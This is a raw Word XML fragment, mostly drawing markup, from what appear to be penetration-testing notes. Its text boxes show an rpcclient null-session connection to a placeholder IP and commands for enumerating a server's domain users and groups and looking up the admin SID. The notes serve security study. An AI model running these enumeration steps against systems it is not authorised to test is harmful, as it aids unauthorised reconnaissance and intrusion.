                              <w:t>rpcclient Connection with Null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636" id="Round Same Side Corner Rectangle 73" o:spid="_x0000_s1071" style="position:absolute;margin-left:85.2pt;margin-top:6.55pt;width:278.2pt;height:3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3242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N9fwIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0Xx0n7iuoUwQpOgwo&#10;2qLp0LMiS4kBWdQoJXb260fJTlq0vWzYRSZNfnyTV9ddY9hOoa/Bljw/GXGmrISqtuuS/3y+/XbB&#10;mQ/CVsKAVSXfK8+vZ1+/XLVuqsawAVMpZGTE+mnrSr4JwU2zzMuNaoQ/AacsCTVgIwKxuM4qFC1Z&#10;b0w2Ho3OshawcghSeU9/b3ohnyX7WisZHrT2KjBTcootpBfTu4pvNrsS0zUKt6nlEIb4hygaUVty&#10;ejR1I4JgW6w/mGpqieBBhxMJTQZa11KlHCibfPQum+VGOJVyoeJ4dyyT/39m5f3uEVldlfx8wpkV&#10;DfXoCba2Ykui2bKuFFsAWmrSExVT2LVRjFSpbq3zU4Iv3SMOnCcyFqHT2MQvpce6VOv9sdaqC0zS&#10;z8npZDIuxpxJkhWXF3mRjGavaIc+fFfQsEiUHGNU4xhVDCQVW+zufCDfBDooExPj6iNJVNgbFYMx&#10;9klpyjT6Tug0Y2phkO0ETYcJecyKbCXNCNG1MUdQ/hlISKlsOBuAg36EqjR7fwM+IpJnsOEIbmoL&#10;+Jn315B1r3/Ivs85ph+6VZfaW5weeraCak89R+iXwTt5W1OF74QPjwJp+mlPaKPDAz3aQFtyGCjO&#10;NoC/P/sf9WkoScpZS9tUcv9rK1BxZn5YGtfLvCji+iWmOD0fE4NvJau3ErttFkAtyel2OJnIqB/M&#10;gdQIzQst/jx6JZGwknyXXAY8MIvQbzmdDqnm86RGK+dEuLNLJ6PxWOg4N8/di0A3jFmgAb2Hw+aJ&#10;6bsZ63Uj0sJ8G0DXaQBjqfu6Di2gdU2zNJyWeA/e8knr9QDO/gAAAP//AwBQSwMEFAAGAAgAAAAh&#10;ACeYuxPeAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj01LxDAQhu+C/yGM4EXcpHW/rE0XEUS8&#10;CK6KeMs2s21pMylNtq3/3vGkt3mZh/cj382uEyMOofGkIVkoEEiltw1VGt7fHq+3IEI0ZE3nCTV8&#10;Y4BdcX6Wm8z6iV5x3MdKsAmFzGioY+wzKUNZozNh4Xsk/h394ExkOVTSDmZic9fJVKm1dKYhTqhN&#10;jw81lu3+5DSsYnv1+bzEpyQd7Ranr/bl+KG0vryY7+9ARJzjHwy/9bk6FNzp4E9kg+hYb9SSUT5u&#10;EhAMbNI1bzlouE1WIItc/l9Q/AAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCGxjN9fwIA&#10;AEgFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAnmLsT&#10;3gAAAAkBAAAPAAAAAAAAAAAAAAAAANkEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;5AUAAAAA&#10;" adj="-11796480,,5400" path="m83025,l3450217,v45853,,83025,37172,83025,83025l3533242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3450217,0;3533242,83025;3533242,498143;3533242,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3533242,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F63C45" w:rsidRPr="003229F4" w:rsidRDefault="00F63C45" w:rsidP="00476B3F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F63C45">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>rpcclient Connection with Null Session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F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="008D602E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0206C0" wp14:editId="06C9D277">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2621889</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7138</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="497205"/>
                <wp:effectExtent l="19050" t="0" r="38100" b="36195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72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1978" id="Down Arrow 94" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:206.45pt;margin-top:.55pt;width:36pt;height:39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L2cwIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X50U6bYYdYqgRYcB&#10;RVssHXpWZCk2IIkapcTJfv0o2XGKtthhmA8yJZKPH3rU5dXeGrZTGFpwFZ+eTThTTkLduk3Ffz7d&#10;fvrKWYjC1cKAUxU/qMCvFh8/XHa+VOfQgKkVMgJxoex8xZsYfVkUQTbKinAGXjlSakArIm1xU9Qo&#10;OkK3pjifTD4XHWDtEaQKgU5veiVfZHytlYwPWgcVmak45Rbzinldp7VYXIpyg8I3rRzSEP+QhRWt&#10;o6Aj1I2Igm2xfQNlW4kQQMczCbYArVupcg1UzXTyqppVI7zKtVBzgh/bFP4frLzfPSJr64rPZ5w5&#10;YemObqBzbIkIHaND6lDnQ0mGK/+Iwy6QmMrda7TpT4Wwfe7qYeyq2kcm6XB28YVuijNJqtmc5IuE&#10;WZycPYb4TYFlSah4TeFz9NxQsbsLsbc/2pFzyqjPIUvxYFRKw7gfSlM1FPU8e2ceqWuDbCeIAUJK&#10;5eK0VzWiVv3xxYS+IanRI6eYAROybo0ZsQeAxNG32H2ug31yVZmGo/Pkb4n1zqNHjgwujs62dYDv&#10;ARiqaojc2x+b1LcmdWkN9YHuGqEfguDlbUsNvxMhPgok1tMd0STHB1q0ga7iMEicNYC/3ztP9kRG&#10;0nLW0RRVPPzaClScme+OaDqfzmZp7PImE4EzfKlZv9S4rb0GuqYpvRleZpGcMZqjqBHsMw38MkUl&#10;lXCSYldcRjxurmM/3fRkSLVcZjMaNS/inVt5mcBTVxOXnvbPAv3Aukh0vYfjxInyFe962+TpYLmN&#10;oNtMylNfh37TmGbiDE9Kegde7rPV6eFb/AEAAP//AwBQSwMEFAAGAAgAAAAhAAn5/XfcAAAACAEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHizC0i0IEtjTHsx9mD14m0KI5Cys8hu&#10;Af+940mPL9/Lm2+KzWJ7NdHoO8cG4lUEirhydceNgfe33c0alA/INfaOycA3ediUlxcF5rWb+ZWm&#10;Q2iUjLDP0UAbwpBr7auWLPqVG4iFfbrRYpA4NroecZZx2+skiu60xY7lQosDPbVUnQ5na2DeL6g/&#10;tlm33UUvye3JPe+T6cuY66vl8QFUoCX8leFXX9ShFKejO3PtVW8gjZNMqgJiUMLTdSr5aOA+S0GX&#10;hf7/QPkDAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAgGry9nMCAABABQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEACfn9d9wAAAAIAQAADwAAAAAA&#10;AAAAAAAAAADNBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANYFAAAAAA==&#10;" adj="11669" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="008D602E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64C80E" wp14:editId="045B8905">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2954909</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>131876</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3166948" cy="629107"/>
                <wp:effectExtent l="0" t="0" r="14605" b="1905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948" cy="6291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F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                            <w:r>
                              <w:t>rpcclient -U "" -N IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E67F88" w:rsidRDefault="004A29C7" w:rsidP="00E67F88">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; </w:t>
                            </w:r>
                            <w:r w:rsidR="00E67F88" w:rsidRPr="007D28B7">
                              <w:t>-N= No password = Null session</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E67F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F8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4C80E" id="Rounded Rectangle 75" o:spid="_x0000_s1072" style="position:absolute;margin-left:232.65pt;margin-top:10.4pt;width:249.35pt;height:49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pQcgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmKwUqUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAXPjyacKSuhrOym4N+erj+d&#10;cuaDsKUwYFXBD8rzi+XHD+eNW6gpbMGUChkFsX7RuIJvQ3CLLPNyq2rhj8ApS0oNWItAIm6yEkVD&#10;0WuTTSeTedYAlg5BKu/p71Wn5MsUX2slw53WXgVmCk61hXRiOtfxzJbnYrFB4baV7MsQ/1BFLSpL&#10;ScdQVyIItsPqt1B1JRE86HAkoc5A60qq1AN1k0/edPO4FU6lXggc70aY/P8LK2/398iqsuAnx5xZ&#10;UdOMHmBnS1WyB0JP2I1RjHQEVOP8guwf3T32kqdr7LrVWMcv9cPaBO5hBFe1gUn6+Tmfz89mRAdJ&#10;uvn0LJ+cxKDZi7dDH74oqFm8FBxjGbGGBKzY3/jQ2Q925BxL6opIt3AwKtZh7IPS1BWlzZN34pO6&#10;NMj2gpggpFQ2pKYof7KObroyZnSc/tmxt4+uKnFtdP6LrKNHygw2jM51ZQHfy15+z3vIdGc/IND1&#10;HSEI7bpN45zNh5GtoTzQjBE68nsnrysC+Eb4cC+Q2E57QRsc7ujQBpqCQ3/jbAv4873/0Z5ISFrO&#10;GtqegvsfO4GKM/PVEj3P8tksrlsSZscnUxLwtWb9WmN39SXQWHJ6K5xM12gfzHDVCPUzLfoqZiWV&#10;sJJyF1wGHITL0G01PRVSrVbJjFbMiXBjH50ciBC589Q+C3Q9ywLx8xaGTROLNzzrbOOILKx2AXSV&#10;SBih7nDtR0DrmbjcPyVx/1/LyerlwVv+AgAA//8DAFBLAwQUAAYACAAAACEA1AezFNwAAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KjdEAIJcSqKYMGSwgdMYzeJGo+j2HnA&#10;1zOsYDmao3vPLXer68Vsx9B50rDdKBCWam86ajR8frzePIAIEclg78lq+LIBdtXlRYmF8Qu92/kQ&#10;G8EhFArU0MY4FFKGurUOw8YPlvh38qPDyOfYSDPiwuGul4lSmXTYETe0ONjn1tbnw+Q0vJj9ybyd&#10;abrfuzB8L2mCak60vr5anx5BRLvGPxh+9VkdKnY6+olMEL2GNLu7ZVRDongCA3mW8rgjk9s8B1mV&#10;8v+E6gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBRTfpQcgIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDUB7MU3AAAAAoBAAAPAAAAAAAA&#10;AAAAAAAAAMw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67F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                      <w:r>
                        <w:t>rpcclient -U "" -N IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E67F88" w:rsidRDefault="004A29C7" w:rsidP="00E67F88">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; </w:t>
                      </w:r>
                      <w:r w:rsidR="00E67F88" w:rsidRPr="007D28B7">
                        <w:t>-N= No password = Null session</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E67F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F88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 w:rsidR="00E67F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C95BF2" wp14:editId="40D93645">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>282575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>131877</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2457907" cy="6286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E67F88" w:rsidP="00E67F88">
                            <w:r>
                              <w:t>rpcclient –h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E67F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt;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95BF2" id="Rounded Rectangle 31" o:spid="_x0000_s1073" style="position:absolute;margin-left:22.25pt;margin-top:10.4pt;width:193.55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VFcwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Te67Vd52ayDsYhpRAS&#10;k6TkWdZK9lKtRh3J3nW/viPtJSENtJS+aDU79zNndHnVVIYdFPoSbM4nozFnykooSrvN+benm0/n&#10;nPkgbCEMWJXzo/L8avHxw2Xt5moKOzCFQkZBrJ/XLue7ENw8y7zcqUr4EThlSakBKxFIxG1WoKgp&#10;emWy6Xh8mtWAhUOQynv6e90q+SLF11rJcK+1V4GZnFNtIZ2Yzk08s8WlmG9RuF0puzLEP1RRidJS&#10;0iHUtQiC7bH8LVRVSgQPOowkVBloXUqVeqBuJuM33TzuhFOpFwLHuwEm///CyrvDGllZ5PzzhDMr&#10;KprRA+xtoQr2QOgJuzWKkY6Aqp2fk/2jW2MnebrGrhuNVfxSP6xJ4B4HcFUTmKSf09nJ2cX4jDNJ&#10;utPp+elJQj978XbowxcFFYuXnGMsI9aQgBWHWx8oLdn3diTEktoi0i0cjYp1GPugNHVFaSfJO/FJ&#10;rQyygyAmCCmVDSexKYqXrKObLo0ZHKd/duzso6tKXBuc/yLr4JEygw2Dc1VawPeyF9/THKhk3dr3&#10;CLR9RwhCs2nSOGdn/cg2UBxpxggt+b2TNyUBfCt8WAskttNe0AaHezq0gTrn0N042wH+fO9/tCcS&#10;kpazmrYn5/7HXqDizHy1RM+LyWwW1y0JNPgpCfhas3mtsftqBTQWYiBVl67RPpj+qhGqZ1r0ZcxK&#10;KmEl5c65DNgLq9BuNT0VUi2XyYxWzIlwax+d7IkQufPUPAt0HcsC8fMO+k0T8zc8a23jiCws9wF0&#10;mUgYoW5x7UZA65m41D0lcf9fy8nq5cFb/AIAAP//AwBQSwMEFAAGAAgAAAAhABbFH9jcAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyonRD6CHEqimDBksIHTGM3iRqPo9h5&#10;wNczrGA5ukd3zi32i+vEZIfQetKQrBQIS5U3LdUaPj9e77YgQkQy2HmyGr5sgH15fVVgbvxM73Y6&#10;xlpwCYUcNTQx9rmUoWqsw7DyvSXOzn5wGPkcamkGnLncdTJVai0dtsQfGuztc2Ory3F0Gl7M4Wze&#10;LjRuDi7033OWoppSrW9vlqdHENEu8Q+GX31Wh5KdTn4kE0SnIcsemNSQKl7AeXafrEGcGEx2W5Bl&#10;If8vKH8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAWbylRXMCAAA4BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAFsUf2NwAAAAJAQAADwAAAAAA&#10;AAAAAAAAAADN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E67F88" w:rsidP="00E67F88">
                      <w:r>
                        <w:t>rpcclient –h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E67F88" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; Help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8B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="00F877C1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45EA32" wp14:editId="0B3674FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>283845</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>256540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1338580" cy="1257935"/>
                <wp:effectExtent l="0" t="0" r="13970" b="1841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257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F88" w:rsidRDefault="00E67F88" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>After connecting with rpcclient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5EA32" id="Oval 76" o:spid="_x0000_s1074" style="position:absolute;margin-left:22.35pt;margin-top:20.2pt;width:105.4pt;height:99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2gfQIAAE0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVF9P2zAQf5+072D5faQpLZSKFFUgpkkI&#10;qsHEs+vYxJLt82y3Sffpd3bSgAbaw7Q8OHe+u9/99+VVZzTZCx8U2IqWJxNKhOVQK/tS0R9Pt18W&#10;lITIbM00WFHRgwj0avX502XrlmIKDehaeIIgNixbV9EmRrcsisAbYVg4AScsCiV4wyKy/qWoPWsR&#10;3ehiOpmcFS342nngIgS8vemFdJXxpRQ8PkgZRCS6ohhbzKfP5zadxeqSLV88c43iQxjsH6IwTFl0&#10;OkLdsMjIzqt3UEZxDwFkPOFgCpBScZFzwGzKyR/ZPDbMiZwLFie4sUzh/8Hy+/3GE1VX9PyMEssM&#10;9uhhzzRBFmvTurBElUe38QMXkEyJdtKb9McUSJfreRjrKbpIOF6Wp6eL+QLLzlFWTufnF6fzhFq8&#10;mjsf4lcBhiSiokJr5ULKmS3Z/i7EXvuohaYpoj6GTMWDFklZ2+9CYh7odZqt8wSJa+0JZlNRxrmw&#10;sexFDatFfz2f4DeENFrkADNgQpZK6xF7AEjT+R67j3XQT6YiD+BoPPlbYL3xaJE9g42jsVEW/EcA&#10;GrMaPPf6xyL1pUlVit22yz2eLZJqutpCfcDGe+g3Ijh+q7ADdyzEDfO4Atg1XOv4gIfU0FYUBoqS&#10;Bvyvj+6TPk4mSilpcaUqGn7umBeU6G8WZ/ainM3SDmZmNj+fIuPfSrZvJXZnrgE7V+ID4ngmk37U&#10;R1J6MM+4/evkFUXMcvRdUR79kbmO/arj+8HFep3VcO8ci3f20fEEngqdxuupe2beDWMYcYLv4bh+&#10;70ax102WFta7CFLlOX2t69AC3Nk8S8P7kh6Ft3zWen0FV78BAAD//wMAUEsDBBQABgAIAAAAIQAu&#10;rPYz3wAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqE1JIA1xKoQUCZB6&#10;IKR3N14Sq7EdxU4b+HqWE5x2VzOafVNsFzuwE07BeCfhdiWAoWu9Nq6T0HxUNxmwEJXTavAOJXxh&#10;gG15eVGoXPuze8dTHTtGIS7kSkIf45hzHtoerQorP6Ij7dNPVkU6p47rSZ0p3A58LcQ9t8o4+tCr&#10;EZ97bI/1bCV8v1SNifOmzkTzdtwlr5XnZi/l9dXy9Ags4hL/zPCLT+hQEtPBz04HNkhIkgdy0hQJ&#10;MNLXaZoCO9Byl6XAy4L/b1D+AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF8/baB9AgAA&#10;TQUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAC6s9jP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67F88" w:rsidRDefault="00E67F88" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>After connecting with rpcclient</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D60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F37ACD" wp14:editId="77BB00C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2186940</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>13412</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3935095" cy="1923897"/>
                <wp:effectExtent l="0" t="0" r="27305" b="196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95" cy="19238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7D28B7" w:rsidP="00E67F88">
                            <w:r>
                              <w:t xml:space="preserve">?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 w:rsidR="00E67F88">
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r>
                              <w:t>&lt;&lt;&lt; help</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                            <w:r>
                              <w:t>S</w:t>
                            </w:r>
                            <w:r w:rsidR="007D28B7">
                              <w:t>rvinfo</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidR="008D602E">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidR="008D602E">
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> &lt;&lt;&lt; Getting info from remote server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                            <w:r>
                              <w:t xml:space="preserve">enumdomusers  </w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t xml:space="preserve"> &lt;&lt;&lt; getting user list</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                            <w:r>
                              <w:t>enumdomgroups</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidR="00E67F88">
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r>
                              <w:t>&lt;&lt;&lt; getting group list</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                            <w:r>
                              <w:t xml:space="preserve">lookupnames username  </w:t>
                            </w:r>
                            <w:r w:rsidR="00E67F88">
                              <w:t xml:space="preserve">   </w:t>
                            </w:r>
                            <w:r>
                              <w:t>&lt;&lt;&lt; Get full SID of admin</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88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37ACD" id="Rounded Rectangle 32" o:spid="_x0000_s1075" style="position:absolute;margin-left:172.2pt;margin-top:1.05pt;width:309.85pt;height:15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wucwIAADkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmL4NWpKgCMU1C&#10;gICJz65jt9Ecn3d2m3S/fmcnDYghbZr2JfH5nnt/zucXbW3YXqGvwBY8PxlxpqyEsrKbgn97uv50&#10;xpkPwpbCgFUFPyjPL5YfP5w3bqHGsAVTKmTkxPpF4wq+DcEtsszLraqFPwGnLCk1YC0CibjJShQN&#10;ea9NNh6NPmcNYOkQpPKebq86JV8m/1orGe609iowU3DKLaQvpu86frPluVhsULhtJfs0xD9kUYvK&#10;UtDB1ZUIgu2w+s1VXUkEDzqcSKgz0LqSKtVA1eSjN9U8boVTqRZqjndDm/z/cytv9/fIqrLgkzFn&#10;VtQ0owfY2VKV7IG6J+zGKEY6alTj/ILwj+4ee8nTMVbdaqzjn+phbWruYWiuagOTdDmZT2aj+Ywz&#10;Sbp8Pp6czU+j1+zF3KEPXxTULB4KjjGPmETqrNjf+NDhjzgyjjl1WaRTOBgVEzH2QWkqi+LmyToR&#10;Sl0aZHtBVBBSKhtmffyEjma6MmYwHP/ZsMdHU5XINhj/RdTBIkUGGwbjurKA70Uvv+d9yrrDHzvQ&#10;1R1bENp1m+Y5nUdovFpDeaAhI3Ts905eV9TgG+HDvUCiOy0GrXC4o4820BQc+hNnW8Cf791HPLGQ&#10;tJw1tD4F9z92AhVn5qslfs7z6TTuWxKms9MxCfhas36tsbv6EmgsOT0WTqZjxAdzPGqE+pk2fRWj&#10;kkpYSbELLgMehcvQrTW9FVKtVglGO+ZEuLGPTh6JELnz1D4LdD3LAhH0Fo6rJhZveNZh44gsrHYB&#10;dJVI+NLXfgS0n4nL/VsSH4DXckK9vHjLXwAAAP//AwBQSwMEFAAGAAgAAAAhAEdNAhjcAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyonRBKG+JUFMGCJYUPmMZuEjUeR7Hz&#10;gK9nWNHdjM7VnTPFbnGdmOwQWk8akpUCYanypqVaw9fn290GRIhIBjtPVsO3DbArr68KzI2f6cNO&#10;h1gLLqGQo4Ymxj6XMlSNdRhWvrfE7OQHh5HXoZZmwJnLXSdTpdbSYUt8ocHevjS2Oh9Gp+HV7E/m&#10;/Uzj496F/mfOUlRTqvXtzfL8BCLaJf6H4U+f1aFkp6MfyQTRabjPsoyjGtIEBPPtOuPhyEA9JCDL&#10;Ql5+UP4CAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA5xTsLnMCAAA5BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAR00CGNwAAAAJAQAADwAAAAAA&#10;AAAAAAAAAADN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7D28B7" w:rsidP="00E67F88">
                      <w:r>
                        <w:t xml:space="preserve">?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 w:rsidR="00E67F88">
                        <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r>
                        <w:t>&lt;&lt;&lt; help</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                      <w:r>
                        <w:t>S</w:t>
                      </w:r>
                      <w:r w:rsidR="007D28B7">
                        <w:t>rvinfo</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidR="008D602E">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidR="008D602E">
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> &lt;&lt;&lt; Getting info from remote server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                      <w:r>
                        <w:t xml:space="preserve">enumdomusers  </w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t xml:space="preserve"> &lt;&lt;&lt; getting user list</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                      <w:r>
                        <w:t>enumdomgroups</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidR="00E67F88">
                        <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r>
                        <w:t>&lt;&lt;&lt; getting group list</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88">
                      <w:r>
                        <w:t xml:space="preserve">lookupnames username  </w:t>
                      </w:r>
                      <w:r w:rsidR="00E67F88">
                        <w:t xml:space="preserve">   </w:t>
                      </w:r>
                      <w:r>
                        <w:t>&lt;&lt;&lt; Get full SID of admin</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="00E67F88"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8B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="00F877C1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93C4ED" wp14:editId="68F68C64">
                <wp:simplePos x="0" y="0"/>
